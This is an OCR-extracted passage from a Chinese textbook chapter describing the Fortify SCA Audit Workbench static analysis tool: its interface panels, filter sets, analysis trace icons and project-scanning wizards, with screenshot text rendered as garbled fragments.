转换 : 使 用 源 代码 创建 中 间 文 件 ， 源 代码 与 一 个 Build ID 相关 联 ，Build ID 通常 就 是 
项 目 名 称 ; 

扫描 与 分 析 : 扫描 中 间 文 件 ， 分 析 代 码 ， 并 将 结果 写 入 一 个 Fortify Project Results (FPR) 
文件 ; 

校 验 : 确保 所 有 源 文 件 均 包 含 在 扫描 过 程 中 ， 使 用 的 是 正确 的 规则 包 ， 且 没有 报告 重大 
错误 。 


2) 安全 编码 规则 包 概述 

安全 编码 规则 包 是 Fortify Software 安全 研究 小 组 多 年 软件 安全 经 验 的 体现 ， 并 且 经 过 其 
不 断 努 力 改进 而 成 。 这 些 规则 是 通过 对 编码 理论 和 长 期 编码 实践 的 研究 而 积累 的 软件 安全 知 
识 ， 并 且 在 Fortify Software 安全 研究 小 组 的 努力 下 不 断 扩展 和 改进 。 每 个 安全 编码 规则 包 均 
包含 大 量规 则 ， 每 个 规则 定义 了 一 个 被 SCA 检测 出 的 特定 异常 行为 。 
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一 旦 检测 出 安全 问题 ， 安 全 编码 规则 包 会 提供 有 关 问 题 的 信息 ， 让 开发 人 员 能 够 有 时 间 
计划 并 实施 修复 工作 ， 这 样 比 研究 问题 的 安全 细节 更 有 效 。 这 些 信息 包括 关于 问题 类 别 的 具 
体 信 息 、 该 问题 会 如 何 被 攻击 者 利用 ， 以 及 开发 人 员 如 何 确保 代码 不 受 此 漏洞 的 威胁 。 

安全 编码 规则 包 支 持 多 种 编程 语言 ， 也 支持 各 种 经 过 扩展 的 第 三 方 库 和 配置 文件 。 

2. Audit Workbench 界面 概述 

1) 开始 页 面 概 述 

如 图 5-32 所 示 ， 开 始 页 面包 含 以 下 几 个 区 域 : 


| OR Í | Y i 
Start New Project 
Scan Java Project 
e5 Visual Studio Build Integration 
S 


Advanced Scan 


Custom Rules Editor 
Open Rulepack 


New Rulepack... 
Open Project 

Recent Projects: 

ÉQinjection 0 9; Audted Dec 19, 2007 
webgoat 1 % Audted Dec 14, 2007 
java 0% Audted Dec 14, 2007 
webapp 0% Audted Dec 13, 2007 
userserv 0% Audited Dec 13, 2007 
javal.5 0% Audted Dec 13, 2007 
userserv (bad, useserv.fpr) 0 95 Audted Dec 13, 2007 
test: 0% Audted Dec 13, 2007 
ajax tables (forErik.fpr) 0% Audted Dec 12, 2007 
ajax t 0% Audted Dec 12, 2007 


Open Project 


图 5-32 Audit Workbench 开始 页 面 


Start New Project( 启 动 新 项 目 ): 启动 源 代码 扫描 向 导 ; 

Custom Rules Editor ( 自 定 义 规则 编辑 器 ): 启动 用 于 创建 和 检查 安全 规则 或 编码 实践 规则 
的 工具 ， 这 些 规 则 可 针对 源 代 码 进行 自 定义 ; 

Open Project( 打 开 项 目 ): 单 击 某 一 项 目 名 称 可 打开 最 近 的 项 目 ; 或 使 用 “Open Project( 打 
开 项 目 )” 链 接 可 定位 到 某 一 项 目 。 


2) 审计 界面 概述 
图 5-33 显示 了 Auditing (审计 ) 界 面 中 的 Webgoat FPR 文件 示例 。 
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aunit wonkaench Mis 20 4 


日 个 Privacy Voetion - [0/ 771 
CI Race Co 
C1 SQ. Injection - [0 / 48] 
C] XPath Injecton - [0 / 1] 


All issues by Folder 


ndton: Singetor Member Field - [ 


Hgn Qs) 


Analyss Evidence 


Sod yowmpuwcbuootiesom w] 
1 D 


Search: 


[d 5-33 Audit Workbench 界面 


Audit Workbench 界面 由 以 下 几 个 面板 组 成 


Issues( 问 题 ) 面 板 

Analysis Trace( 分 析 跟 踪 ) 面 板 

Project Summary( 项 目 摘要 ) 面 板 

Source Code Viewer( 源 代码 查看 器 ) 面 板 
Function( 函 数 ) 面 板 

Issue Auditing( 问 题 审计 ) 面 板 


如 图 5-34 所 示 ， 使 用 Issues (问题 ) 面 板 ， 可 以 对 希望 审计 的 问题 进行 分 组 和 选择 。 该 面 
板 由 下 列 元 素 组 成 ; 


Filter Set( 过 滤器 组 ) 下 拉 列 表 
Folders( 文 件 夹 ) 选 项 卡 
Group by( 分 组 方式 ) 
Search( 搜 索 ) 框 

Filter Set( 过 滤器 组 ) 下 拉 列 表 


过 滤器 组 控制 着 Issues( 问 题 ) 面 板 的 设置 和 显示 属性 。 过 滤器 组 是 项 目 配 置 的 一 部 分 。 可 
为 每 个 项 目 自 定义 不 同 的 过 滤器 组 。 每 个 项 目 均 可 具有 唯一 的 过 滤器 组 。 
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过 滤器 组 Filter Set: Broad — | 
tnt — — — 5. || voc a r TEARS] 
分 组 广 式 一 一 一 一 一 > ||GroupBy: [cateoory v] 


BO Cross-Site Scripting - [0 / 54] ^ 
E) AbstractLesson.java:640 (Cross-Sie Scripting; 
而 | AbstractLesson.java:640 (Cross-Ske Scripting) - 
| AbstractLesson.java:837 (Cross-Ste Scripting) 
| AbstractLesson.java:837 (Cross-Ske Scripting; 
A! BasicAuthentication. java: 103 (Cross-Site Scrip 
W) BasicAuthentication. java: 104 (Cross-Site Scrip 
而 | BlindSqlInjection.java:57 (Cross-Site Scripting) 
而 | ChallengeScreen java:282 (Cross-Site Scriptin 
E) DatabaseLkilities.java:113 (Cross-Site Scriptin, 
A! DatabaseUtilties.java: 13 (Cross-Site Scriptin © 


EN ETOILE 


€ > 


问题 列表 一 一 一 一 一 一 | 


P Advanced. 


搜索 框 


图 5-34 ”问题 面板 


Filter Set( 过 滤器 组 ) 部 分 包含 以 下 设置 : 

文件 夹 的 名 称 和 颜色 。 要 进行 配置 ， 请 选择 Tools( 工 具 )， 再 选择 Project Configuration( 项 
目 配置 ) 和 Folder Settings( 文 件 夹 设置 ); 

问题 列 出 的 位 置 , 以 及 是 否 列 出 。 要 进行 配置 , 请 选择 Options( 选 项 ), 再 选择 Show View 
(显示 视图 ) 和 Filters (过 滤器 )。 

注意 ，Audit Guide Visibility Filters( 审 计 指 南 可 见 性 过 小 器) 配置 适用 于 整个 项 目 。 

Fortify Software 提供 了 默认 过 滤器 组 ， Broad( 广 泛 )、Medium( 普 通 )、Targeted( 特 定 ) 和 
Developer( 开 发 人 员 )。Filter Sets( 过 滤器 组 ) 将 问题 按 严 重 性 归 类 于 HOE), Warming(? 15) 
和 Info( 信 息 ) 文 件 夹 中 。 所 有 过 滤器 组 都 具有 相同 的 文件 夹 过 滤器 。 

不 同 的 “Filter Sets( 过 滤器 组 )” 中 会 显示 和 隐藏 不 同 的 问题 

Broad( 广 泛 ): 使 用 最 全 面 的 规则 组 显示 问题 。 应 使 用 该 过 滤器 组 来 发 现 要 审计 的 一 组 广 
泛 的 安全 问题 ; 

Medium( 普 通 )， 显示 了 在 产生 结果 ( 详 述 潜在 问题 ) 和 产生 预期 可 能 的 漏洞 组 之 间 打 破 平 
衡 的 问题 ; 

Targeted( 特 定 ): 显示 在 多 种 行业 内 及 各 种 环境 下 经 证 实 的 具有 高 优先 级 的 问题 类 别 。 应 
使 用 这 些 过 滤器 组 来 发 现 一 组 有 限 的 众所周知 的 关键 安全 问题 ; 

Developer (FRAR): 显示 开发 人 员 尤 为 关注 的 问题 ， 如 高 准确 性 bug. 

。 Folders( 文 件 夹 ) 选 项 卡 

Issues( 问 题 ) 面 板 上 的 选项 卡 称 为 “文件 夹 ”。 使 用 Project Configuration( 项 目 配置 )， 可 以 
自 定义 文件 夹 及 其 设置 。 因 此 ， 不 同 过 滤器 组 和 项 目 之 间 的 文件 夹 数目 、 名 称 、 颜 色 和 问题 
列表 各 不 相同 。 

文件 夹 过 滤器 将 问题 归 类 于 各 种 文件 夹 中 。 如 果 某 个 问题 与 任何 文件 夹 过 滤器 都 不 
配 ， 该 问题 将 被 列 在 默认 文件 夹 中 。 可 见 性 过 滤器 决定 了 某 个 问题 是 否 显示 在 列表 中 。 


fei 
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注意 : 可 选择 Option( 选 项 )、Show Suppressed( 显 示 已 废除 项 )、Show Hidden( 显 示 隐 藏 
项 )( 显 示 与 可 见 性 过 滤器 匹配 的 项 目 ) 以 及 Show Removed( 显 示 删 除 项 )。 

。 Group by( 分 组 方式 ) 

Group by( 分 组 方式 ) 选 项 用 于 将 问题 列表 归 类 到 各 个 子 文件 夹 中 。 选 定 的 选项 会 应 用 于 
所 有 可 见 文件 夹 。 使 用 <none (无 > 选项 ， 可 列 出 文件 夹 中 的 所 有 项 目 而 不 进行 任何 分 组 。 
使 用 Audit Workbench, 通过 更 改 对 分 组 进行 归 类 所 依据 的 属性 、 添 加 或 删除 属性 以 创建 
子 分 组 以 及 添加 自己 的 分 组 选项 ， 可 对 现 有 分 组 进行 自 定义 。 

Group by( 分 组 方式 ) 设 置 适用 于 Audit Workbench 实例 。 可 将 分 组 方式 选项 应 用 于 任何 利 
用 Audit Workbench 实例 打开 的 项 目 。 

Search( 搜 索 ) 框 使 用 Search( 搜 索 ) 字 段 , 可 以 限制 文件 夹 中 显示 的 问题 和 搜索 特定 的 问题 。 

e Analysis Trace( 分 析 跟 踪 ) 面 板 
当选 择 某 个 问题 后 ，Analysis Trace( 分 析 跟 踪 ) 面 板 会 显示 相关 的 trace output。 通 常情 况 
下 ， 这 是 一 系列 进程 点 ， 显 示 了 分 析 器 是 如 何 找到 该 问题 的 。 对 于 数据 流 和 控制 流 问题 ， 这 
-系列 点 会 以 执行 顺序 显示 。 
例如 ， 如 果 选 择 某 个 与 可 能 被 感染 数据 流 相 关 的 问题 ，Analysis Trace( 分 析 跟 踪 ) 面 板 会 
显示 这 段 源 代 码 中 数据 流 的 移动 方向 ， 如 图 5-35 所 示 。 


Analysis Trace 


< | Multiple Paths: 10f 5 > 
4() websession.java:197 - getInitParameter(return) 
:二 WebSession.java:197 - Assignment to this.databaseConnectic 
«() HammerHead.java:316 - WebSession(this.databaseConnectioi 
:二 HammerHead.java:316 - Assignment to session 
4l HammerHead.java:328 - Return session 
4() HammerHead.java:78 - updateSession(return.databaseConne 
:二 HammerHead.java:78 - Assignment to this.mySession 
20 HammerHead.java:84 - makeScreen(Ehis : return) 
:二 HammerHead.java:84 - Assignment to screen 
3) HammerHead.java:97 - update(1) 
ẹ() userTracker.java:238 - getTitle(this) 
*»() LessonAdapter.java:183 - getScreenId(this) 


|^ 
v 


图 5-35 “分析 跟踪 面板 


Analysis Trace (分 析 跟 踪 ) 面 板 使 用 图 5-36 中 的 图 标 来 显示 本 段 源 代码 中 数据 流 的 移动 
方式 。 

* Project Summary( 项 目 摘要 ) 面 板 

如 图 5-37 所 示 ，Project Summary( 项 目 摘要 ) 面 板 提供 了 关于 扫描 的 详细 信息 。 

。 Summary( 摘 要 ) 选 项 卡 

* ”Certification( 认 证 ) 选 项 卡 

* Build Infonmation(Build 信息 ) 选 项 卡 
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* Analysis Information( 分 析 信息 ) 选 项 卡 


图 标 描述 
二 数据 被 分 配 到 一 个 字段 或 变量 
BH 信息 读 取 自 某 个 代码 的 外 部 数据 源 (如 HTML. 格式 和 URL. 等 ) 
G 数据 被 分 配 到 一 个 全 局 字段 或 变量 
F1 已 执行 比较 
»t) 函数 调用 收 到 被 感染 的 数据 
A) 函数 调用 返回 被 感染 的 数据 


20 Pass-throush， 被 感染 的 数据 在 函数 调用 中 从 一 个 参数 传递 到 另 一 个 参数 
m 为 某 个 内 存 位 置 创建 一 个 别名 
eu 从 一 个 变量 读 取 数 据 

eu 从 一 个 全 局 变量 读 取 数据 

E] 从 一 个 函数 返回 被 感染 的 数据 
m 创建 一 个 指针 

E 取消 一 个 指针 

E 变量 范围 终止 

m 执行 跳跃 

E 在 代码 执行 中 引入 分 支 

m 代码 执行 中 未 引入 分 支 

A 常规 


图 5-36 ”分析 跟踪 图 标 


[ E Project Summary ] 


Summary | Certification | Buld Information | Anslysis Information | 


Build ID: Scanned: 
Code Scanned: Total Issue: 
Warnings: 1 occured daing scan Certification: 


All issues by Folder 


Hot (75) 
warning (124) 


图 5-37 Project Summary 面板 
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。 Summary( 摘 要 ) 选 项 卡 

。 Summary( 摘 要 ) 选 项 卡 显示 了 关于 本 项 目的 高 级 信息 。 

eCertification( 认 证 ) 选 项 卡 

Certification( 认 证 ) 选 项 卡 显示 了 结果 认证 状态 。 结 果 认 证 用 于 检查 FPR 文件 是 否 与 
FortifySCA 所 生成 的 文件 一 致 。 

* Build Information(Build 信息 ) 选 项 卡 

Build Information(Build 信息 ) 选 项 卡 显示 了 以 下 Fortify SCA. 扫描 信息 : 

Build 详细 信息 , 如 Build ID、 扫 描 的 文件 数 、 扫 描 日 期 ,可 能 会 与 文件 的 转换 日 期 不 同 。 

扫描 的 文件 列表 ， 包 括 文件 大 小 和 时 间 惟 。 

Java 类 路 径 。 

e Analysis Information( 分 析 信息 ) 选 项 卡 

Analysis Information( 分 析 信息 ) 选 项 卡 显示 了 Fortify SCA 的 版 本 、 计 算 机 详细 信息 以 及 
执行 扫描 的 用 户 。 

Analysis Information( 分 析 信 息 ) 子 选项 卡 包含 以 下 信息 : 

规则 包 : 列 出 用 于 扫描 源 代码 的 规则 包 ， 包 括 每 个 规则 包 的 名 称 、ID 和 版 本 号 。 

属性 : 显示 Fortify SCA 属性 文件 的 设置 。 

命令 行 参 数 : 显示 用 来 分 析 项 目的 命令 行 选项 。 

警告 列 出 了 分 析 期 间 发 生 的 所 有 错误 和 警告 。 


3) Source Code Viewer( 源 代码 查看 器 ) 面 板 

Source Code Viewer( 源 代码 查看 器 ) 面 板 显示 了 与 在 Issues (问题 ) 面 板 中 选择 的 问题 相关 
联 的 代码 段 。 如 果 Analysis Trace( 分 析 跟 踪 ) 面 板 中 的 多 个 节点 代表 一 个 问题 ， 则 Source Code 
Viewer( 源 代码 查看 器 ) 面 板 会 显示 与 所 选 节 点 相关 联 的 代码 。 

在 Source Code Viewer( 源 代码 查看 器 ) 面 板 中 , 可 使 用 代码 辅助 功能 创建 自 定义 规则 和 新 
问题 ， 如 下 所 示 : 

要 为 某 个 函数 创建 规则 , 可 将 光标 放 在 该 函数 中 , 单 击 鼠标 右键 , 然后 选择 Write Rule for 
This Function( 为 此 函数 编写 规则 )。 

要 创建 新 间 题 ， 可 将 光标 放 在 该 函数 中 ， 单 击 鼠 标 右键 ， 然 后 选择 Create New Issue( 创 
建新 问题 )。 


4) Function( 函 数 ) 面 板 

如 图 5-38 所 示 ，Function( 函 数 ) 面 板 显示 了 项 目 中 的 函数 /方法 列表 。 使 用 “Function ( 函 
数 )” 面 板 可 找 出 该 函数 在 源 代 码 中 的 位 置 ， 了 解 函数 是 否 应 用 和 匹配 某 个 规则 ， 以 及 编写 和 
验证 自 定义 规则 。 

Function( 函 数 ) 面 板 具 有 以 下 选项 : 

* Show( 显 示 ): 确定 显示 在 该 列表 中 的 函数 ; 

。 ”Group by( 分 组 方式 ): 将 函数 归 类 到 各 个 包 和 类 中 ， 显 示 层 次 结构 或 直接 显示 所 有 函 

数 而 不 进行 分 组 ; 
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* Include unused fonctions( 包 括 未 使 用 的 函数 ): 显示 源 代码 中 的 每 个 函数 。 


Functions 


Show: v 
Group by: MENE v 
Legend. 
© coseQ ^ 


© dose 

€ closelessonSession(AbstractLesson) 

€ compareTo(Integer) 

€ compareTo(Object) 

€ compareTo(Object) 

€ compareTo(Object) 

€ compareTo(String) 

€ compile(String) 

€ completedHackableAdmin() 

© concat(String) s 
< i | > 


Search: | 


图 5-38 ”函数 面板 


默认 情况 下 ， 列 表 中 不 会 包含 未 使 用 的 函数 。 

Legend( 图 例 ): 显示 一 个 用 于 解释 各 个 列表 图 标的 窗口 。 函 数 旁 边 的 图 标 颜 色 指 明 该 函 
数 是 否 应 用 了 规则 ， 如 下 所 示 : 

红色 : 未 应 用 任何 规则 。 

蓝 色 : 可 应 用 规则 ， 但 没有 匹配 的 规则 。 

绿色 : 可 应 用 规则 ， 并 且 有 匹配 的 规则 。 

Search( 搜 索 ): 仅 显 示 包 含 输入 的 字符 串 的 函数 。 该 字段 不 区 分 大 小 写 , 如 果 该 字段 为 空 ， 
将 显示 所 选 组 中 的 所 有 函数 。 

右键 单 击 某 个 函数 可 显示 以 下 选项 : 

* Open Declaration (打开 声明 ): 显示 该 函数 在 源 代码 中 声明 的 位 置 。 

* Find Usages (查找 用 法 ): 创建 函数 所 应 用 于 的 文件 位 置 的 列表 。 会 在 “Audit (审计 )” 
面板 中 打开 “Search (搜索 )” 选 项 卡 ， 其 中 显示 它 所 在 的 文件 名 称 。 

* Generate Rule for Function (为 此 函数 生成 规则 ): 启动 “Custom Rules ( 自 定义 规则 )” 

向 导 来 编写 将 应 用 于 该 函数 的 规则 。 

Show Matched Rule (显示 匹配 的 规则 ): 列 出 了 与 该 函数 相 匹 配 的 所 有 规则 所 属 规则 包 的 

规则 ID 和 文件 名 。 


5) lssue Auditing (问题 审计 ) 面 板 

Issue Auditing (问题 审计 ) 面 板 在 以 下 一 组 选项 卡 中 提供 了 有 关 各 问题 的 详细 信息 : 
。 Summary (摘要 ) 

* Details (详细 信息 ) 

。 Recommendations (建议 ) 

* History (历史 记录 ) 

* Diagram (图 示 ) 
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。 Filter( 过 滤器 ) 
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注意 : 通过 选择 Options( 选 项 )， 再 选择 Show View( 显 示 视 图 ) 菜 单 可 显示 或 隐藏 Issue 
Auditing( 问 题 审计 ) 面 板 中 的 选项 卡 。 


。 Summary( 摘 要 ) 


如 图 5-39 所 示 ，Summary( 摘 要 ) 选 项 卡 显示 了 关于 当前 所 选 问题 的 以 下 信息 。 


规则 信息 
类 别 
领域 


Surunary | Deteils  Recormendeters 
L, Issue: Usersery Java:19 


自 定义 标签 。 Mmalysiss | 
名 称 
t 


[x] (4] 区 to 
废除 
报告 Bug 


图 5-39 Issue Auditing 面板 中 的 Summary 选项 卡 


* 
Race Condition: Singleton 
Field (Time and State, Structur hl) 


Servlet menbor fields may alicw one. 
usar to see another user's data, 


append corrmort 


审计 员 注 释 


K 5-5 描述 了 Summary( 摘 要 ) 面 板 中 的 各 个 选项 : 


R55 摘要 选项 
元 X 描述 
问题 显示 问题 的 位 置 ， 包 括 文件 名 和 行 号 
显示 审计 员 可 以 作为 问题 属性 添加 的 值 的 下 拉 列 表 。 例 如 ， 默 认 情况 下 ， 
“Analysis( 分 析 )” 标 签 提供 了 以 下 值 : 
- Not an issue( 不 是 问题 ) 
Custom Tags - Reliability issue( 可 靠 性 问题 ) 
( 自 定 义 标 签 ) 区 域 - Unknown( 未 知 ) 
- Suspicious( 可 疑 ) 
注意 : 自 定义 标签 即 项 目 设 置 ， 可 选择 “Tools( 工 具 )， 再 选择 
ProjectConfiguration( 项 目 配置 )” 来 更 改 标签 值 
Suppress Issue( 废 除 问题 ) 更 改 严重 级 别 以 废除 和 删除 导航 树 中 的 问题 
File Bug (报告 Bug) 提供 访问 Bug 跟踪 系统 (如 Bugzilla) 的 途径 
Comments (注释 ) 向 注释 字段 中 追加 有 关 问 题 的 其 他 信息 
规则 信息 显示 用 于 描述 问题 的 信息 ， 如 所 属 类 别 和 领域 
更 多 信息 打开 Details( 详 细 信 息 ) 选 项 卡 


Recommendations( 建 议 ) 


打开 Recommendations( 建 议 ) 选 项 卡 
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Details( 详 细 信息 ) 选 项 卡 提供 了 有 关 所 选 问题 的 详细 说 明 ， 并 提供 了 用 于 解决 该 问题 的 
指导 方针 。 每 项 说 明 均 包括 表 5-6 中 所 述 的 部 分 或 全 部 栏目 。 


表 5-6_ 详 细 信息 面板 


元 X 描 述 
Abstract (概要 ) 对 问题 的 概要 描述 
. 关于 会 在 哪些 情况 下 发 生 此 类 问题 的 描述 ， 对 该 漏洞 的 讨论 、 通 常 与 该 
Explanation (解释 ) . 
漏洞 相关 联 的 代码 结构 、 该 漏洞 的 利用 方式 以 及 潜在 的 衍生 攻击 类 型 
实例 ID 问题 的 唯一 识别 符 
规则 ID 标识 用 于 发 现 问题 的 主要 规则 


SCA Confidence(SCA 可 信和 度 ) 
$ 


一 个 由 Fortify SCA 生成 的 衡量 指标 
最 大 化 选项 卡 


Recommendations (建议 ) 选 项 卡 包 含有 关 如 何 避 免 引发 该 漏洞 或 修改 该 漏洞 方法 的 建议 
与 示例 ， 如 表 5-7 所 示 。 


表 5-7_ 建议 信息 


m 素 H x 
Recommendations( 建 议 ) — | 关于 如 何 解 决 问题 的 信息 
Tips (提示 ) 提供 普通 或 者 难以 审计 的 情况 的 示例 ， 给 出 了 有 关 如 何 识别 特定 问题 的 提示 
References( 参 考 信息 ) 参考 相关 信息 
十 最 大 化 选项 卡 


History (历史 记录 ) 显 示 完 整 的 审计 操作 列表 ， 其 中 包括 以 下 详细 信息 : 日 期 和 时 间 、 执 
行 审计 的 计算 机 ， 以 及 修正 该 问题 的 用 户 名 称 。 
如 图 5-40 所 示 ，Diagram( 图 示 ) 选 项 卡 形象 地 说 明了 在 Issues( 问 题 ) 面 板 上 所 选 问题 的 节 
点 执行 顺序 、 调 用 深度 以 及 表达 式 类 型 。 


T 3 FT EXYT Deoram 下 3i ^ r - emes Delak | Frer] 
BlindSgllnjection java:83 (Cross-Site Scripting Reflected) J 
BlindSglinjection craateContent ] ParameterParser getRawParameter ParameterParser getRawParameter 
CORE E i 
QA) getRawParameter(retum) oo 


|) getParameterV; ear) we 


iz Assignment to values. er 


A Retum ED 


() toStringithis _ ratum) 82 


omnium X 


图 5-40 SQL Injection 问题 数据 流 图 示 示 例 
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Diagram( 图 示 ) 选 项 卡 显示 了 与 规则 类 型 相关 的 信息 ， 如 下 所 示 : 


数据 流 规则 : 纵 轴 显示 执行 顺序 。 跟 踪 会 从 顶部 第 一 个 调用 感染 源 的 函数 开始 ， 然 后 追 
踪 对 该 source( 蓝 色 节点 ) 的 调用 情况 ， 并 在 sink( 红 色 节点 ) 处 结束 跟踪 。 在 图 示 中 ， 也 会 标记 
source(src) 和 sink 结 点 。 纵 轴 上 的 红 X 表示 这 个 被 调用 的 函数 已 结束 执行 。 

横 轴 显示 调用 深度 。 用 一 条 线 显 示 控 制 权 的 传递 方向 。 如 果 控 制 权 传递 时 携带 被 感染 数 


据 的 变量 ， 则 该 线条 为 红色 :如 果 没 有 被 感染 数据 ， 则 该 线条 为 黑色 。 


对 于 其 他 所 有 规则 : 纵 轴 显示 执行 顺序 。 每 个 节点 的 表达 式 类 型 用 表 5-8 中 的 图 标 之 一 


表示 。 


3f 


表 5-8_ 图 示 图 标 
描述 


£ iS E O m jii 


—— 


数据 被 分 配 到 一 个 字段 或 变量 

信息 读 取 自 某 个 代码 的 外 部 数据 源 ( 如 HIML 格式 和 URL 等 ) 
数据 被 分 配 到 一 个 全 局 字段 或 变量 

已 执行 比较 

函数 调用 收 到 被 感染 的 数据 

函数 调用 返回 被 感染 的 数据 


Pass-through， 被 感染 的 数据 在 函数 调用 中 从 一 个 参数 传递 到 另 一 个 参数 


为 某 个 内 存 位 置 创建 一 个 别名 
从 一 个 变量 读 取 数据 

从 一 个 全 局 变量 读 取 数据 
从 一 个 函数 返回 被 感染 的 数据 
创建 一 个 指针 

取消 一 个 指针 

变量 范围 终止 


执行 跳跃 


在 代码 执行 中 引入 分 支 


代码 执行 中 未 引入 分 支 


Da aaea aa a 


常规 


* Filter( 过 滤器 ) 


Filter( 过 滤器 ) 选 项 卡 显 示 了 所 选 过 滤器 组 中 的 所 有 过 滤器 ， 如 表 5-9 所 示 。 


表 5-9 过 滤器 选项 卡 中 的 选项 
d x 


可 显示 与 该 过 滤器 匹配 的 问题 ， 也 可 启用 或 禁用 该 过 滤器 


列 出 所 选 过 滤器 组 中 所 配置 的 可 见 性 过 滤器 和 文件 夹 过 滤器 。 右 键 单 击 某 个 过 滤器 
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( 续 表 ) 
选 项 dE xk 
显示 过 滤器 条 件 。 
If 第 一 个 下 拉 列 表 列 出 了 问题 属性 ， 第 二 个 下 拉 列 表 指 定 了 属性 的 匹配 方式 ， 而 第 三 
个 列表 是 过 滤器 所 匹配 的 值 
Then 指示 过 滤器 的 类 型 ， 其 中 ，hide 表示 可 见 性 过 滤器 ，folder 表示 文件 夹 过 滤器 


5.7.2. Audit Workbench 特性 与 功能 


1. 扫描 项 目 


1) 扫描 Java 项 目 

Scan Java Project( 扫 描 Java 项 目 ) 向 导 将 转换 阶段 和 分 析 阶 段 合并 为 一 个 简单 步骤 。 使 用 
此 功能 可 扫描 那些 代码 位 于 单个 目录 中 的 小 型 Java 项 目 。 

扫描 新 的 Java 项 目 : 

a) 打开 Audit Workbench. 

系统 会 显示 开始 页 面 。 

b) 在 New Projects( 新 项 目 ) 中 ， 单 击 Scan Java Project( 扫 描 Java 项 目 )。 

系统 会 显示 Browse for Folder (浏览 文件 夹 ) 对 话 框 。 

c) 选择 包含 所 有 需要 分 析 的 源 代码 的 文件 夹 ， 然 后 单 击 OK( 确 定 )。 

注意 : Fortify SCA 将 Build ID 设 为 文件 夹 名 称 。 

系统 会 显示 AuditGuide Wizard (AuditGuide 向 导 )。 

d) 为 需要 审计 的 问题 类 型 选择 相关 设置 ， 然 后 单 击 Run Scan( 运 行 扫描 )。 

如 果 Fortify SCA 在 扫描 源 代码 时 过 到 任何 问题 ， 会 显示 Waming( 和 敬告) 对话 框 。 

e) 单 击 OK (确定 ) 继 续 。 

Fortify SCA 会 分 析 源 代码 。 完 成 该 过 程 后 ，Audit Workbench 会 显示 FPR 文件 。 


2) 扫描 其 他 项 目 

可 使 用 Advanced Scan( 高 级 扫描 ) 向 导 转 换 和 分 析 Java、JavaScript、PHP、ASP、NET 
和 SQL 项目。 如果 Java 项 目的 源 代码 位 于 多 个 目录 中 、 具 有 特殊 转换 或 构建 条 件 或 包含 需 
要 从 项 目 中 排除 的 文件 ， 应 使 用 Advanced Scan( 高 级 扫描 ) 向 导 。 

扫描 新 项 目 : 

a) 打开 Audit Workbench。 

系统 会 显示 开始 页 面 。 

b) 在 New Projects( 新 项 目 ) 中 ， 单 击 Advanced Scan( 高 级 扫描 )。 

系统 会 显示 Browse for Folder( 浏 览 文件 夹 ) 对 话 框 。 

c) 选择 项 目 所 在 的 根 目录 ， 然 后 单 击 OK( 确 定 )。 

系统 会 显示 Commandline Builder( 命 令 行 构建 器 ) 对 话 框 ， 如 图 5-41 所 示 。 该 向 导 会 自动 
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包含 所 有 在 扫描 中 支持 的 文件 。 
a) 另外 ， 还 可 以 添加 其 他 目录 中 的 文件 : 
单 击 Add Directory( 添 加 目录 )。 
系统 会 显示 Browse to Folder( 浏 览 至 文件 夹 ) 对 话 框 。 
选择 包含 希望 添加 进行 扫描 的 文件 所 在 的 文件 夹 。 
单 击 OK( 确 定 )。 


Specify Visual Studio Solution File: 

Ļ.-\Sample1\Sample.sin Browse 
Specify Visual Studio Version: |2010 x] 
Specify Build Configuration: [ DEBUG 
Specify Buia: [Sampe ——— — — — 
Specify Output File: 
[ C:WsersXthurmonAppDatal ocal/FortifyVAWB-3.80XSample Browse 


[^ Enable Quick Scan Mode 


图 5-41 Commandline Builder 界面 


导航 面板 中 将 会 显示 该 目录 ， 并 会 自动 添加 所 有 受 支 持 的 文件 以 进行 扫描 。 要 删除 该 目 
录 ， 右 键 单 击 相应 的 文件 夹 ， 然 后 选择 Remove Root( 删 除根 )。 
b) 另外 ， 可 排除 文件 或 目录 ， 例 如 测试 源 代码 : 


选择 所 需 文件 或 目录 。 
右键 单 击 并 选择 Exclude( 排 除 )。 
该 文件 夹 会 变 成 灰色 。 


c) 对 于 Java 项 目 ， 设 置 以 下 内 容 : 

选择 包含 类 文件 的 文件 夹 ， 然 后 单 击 Classpath Directory( 类 路 径 目 录 )。 

在 Fortify SCA 转换 阶段 ， 该 文件 夹 会 变 成 蓝 色 ， 且 文件 会 添加 到 类 路 径 中 。 
选择 项 目的 Java 版 本 。 
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d) 输入 BuildID。 默 认 情况 下 ，BuildID 为 根 目录 。 
€) 输入 Fortify SCA 在 分 析 阶 段 生 成 的 FPR 的 路 径 和 文件 名 。 
f) 单 击 Next( 下 一 步 )。 
系统 会 显示 Commandline Builder (命令 行 构建 器 ) 对 话 框 ， 如 图 5-42 所 示 。 
要 跳 过 某 一 阶段 ， 请 取消 色 选 Enable Clean( 启 用 清除 )、Enable Translation( 启 用 转换 ) 或 
Enable Scan( 启 用 扫描 ) 复 选 框 。 
根据 需要 ， 修 改 每 个 Fortify SCA 阶段 的 命令 行 选项 : 
Enable Clean( 启 用 清除 ): 删除 所 有 Fortify SCA 与 在 Select Source (选择 源 ) 对 话 框 中 设置 
的 Build ID 相关 联 的 中 间 文 件 和 内 部 版 本 记录 。 要 更 改 Build ID， 可 单 击 两 次 Back( 返 回 ); 
Enable Translation( 启 用 转换 ): 创建 Fortify SCA 中 间 文 件 并 为 项 目 指定 Build ID; 
Enable Scan( 启 用 扫描 ): 分 析 源 代码 并 创建 可 在 其 中 添加 审计 信息 的 FPR 文件 。 
另外 ， 还 可 单 击 Manage Rulepacks( 管 理 规则 包 ) 以 使 用 自 定义 规则 包 分 析 源 代码 ， 或 者 
禁用 某 个 安全 编码 规则 包 。 系 统 会 显示 审计 指南 向 导 ， 如 图 5-43 所 示 。 


Commandline Builder 


Stages of Fortify SCA Analysis: 
[7]Enable Clean 


-b "java1.5" -clean 


7] Enable Translation 


"b" 
"javal.5" 

"-machine-output" 

"C:\Program Files\Fortify SoftwarelFortify SCAXSamples|advancedljaval.5" 
"-source" 

"ps" 


»|Enable Scan 


”javal,5" 

"-scan" 
"-machine-output" 
xp 


"C:\Program Files\Fortify SoftwarelFortify SCAlSamples|JAVA, 15.fpr" 
"-Format" 
"for" 


Manage Rulepacks ... 
Run Scan Cancel 


图 5-42 Commandline Builder 界面 
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(i commandtine Builder 


| How concemed about soonity are you? 
© Show me all issues that may have security implications. 
O Show me likely problems. 
© Show me only remotely exploitable issues. 
ncerned about attacks that can orig! 'om remote and local attackers. This | 
n might be infiuenced by dat: t have not been verified for data 
Are you concerned about code quality in addition to security? 
© Show me all code quality issues. 
© Show me quality issues that may result in program instability. 
OO No, I don't want to see code quality issues. 
1 am concerned about issues may impact stability or make the code base more 
difficult to maintain. 
